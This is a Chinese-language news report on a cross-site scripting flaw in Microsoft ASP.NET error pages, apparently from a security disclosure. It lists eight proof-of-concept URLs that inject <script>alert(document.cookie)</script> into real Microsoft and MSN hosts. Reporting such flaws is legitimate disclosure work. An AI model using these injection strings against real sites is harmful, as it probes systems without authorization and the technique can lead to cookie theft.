据安全专家Johannes Westerink日前称，拥有众多用户群的微软ASP.NET存在跨站脚本漏洞（CSS）。跨站脚本的Javascript可以在某个站点或电子邮件中放置一恶意URL，若用户点击了该URL，则用户的机器会受到多种方式的入侵，包括爆光共享的东西或获取数据文件，如cookies。JavaScript还可通过恶意的URL在远程服务器上运行，这样将会导致大量潜在的攻击。其中最常见的便是完全路径被爆露的404网页产生。

　　下面是Westerink发现的一些例子：

　　http://www.msn.com/~/<script>alert(document.cookie)</script>.aspx?aspxerrorpath=null

　　http://my.msn.com/~/<script>alert(document.cookie)</script>.aspx?aspxerrorpath=null

　　http://dotnet.microsoft.com/<script>alert(document.cookie)</script>.aspx

　　http://terraserver.microsoft.net/<script>alert(document.cookie)</script>.aspx

　　http://support.microsoft.com/~/<script>alert(document.cookie)</script>.aspx?aspxerrorpath=null

　　http://office.microsoft.com/~/<script>alert(document.cookie)</script>.aspx?aspxerrorpath=null

　　http://communities.microsoft.com/~/<script>alert(document.cookie)</script>.aspx

　　http://uddi.microsoft.com/~/<script>alert(document.cookie)</script>.aspx

　　Westerink称他在六个月前就向微软反映了此问题，但未得到回应。另外，互联网安全顾问Richard M. Smith也指出，他对微软存在的这个问题进行检查过，而且并被告知在软件最终版本出台之前，这便是一个在ASP.NET中得到修补的最常见的Bug。所以微软确实知道这一事情，但有点忽视，没有对任休人提及，即使Westerink向他们提出后也是一样。他还强调称，目前仍存在该bug的微软各种Web服务器现在运行的是ASP.NET正式发布前的一个版本。看起来，微软似乎在制作补丁及升级包方面仍有点跟不上。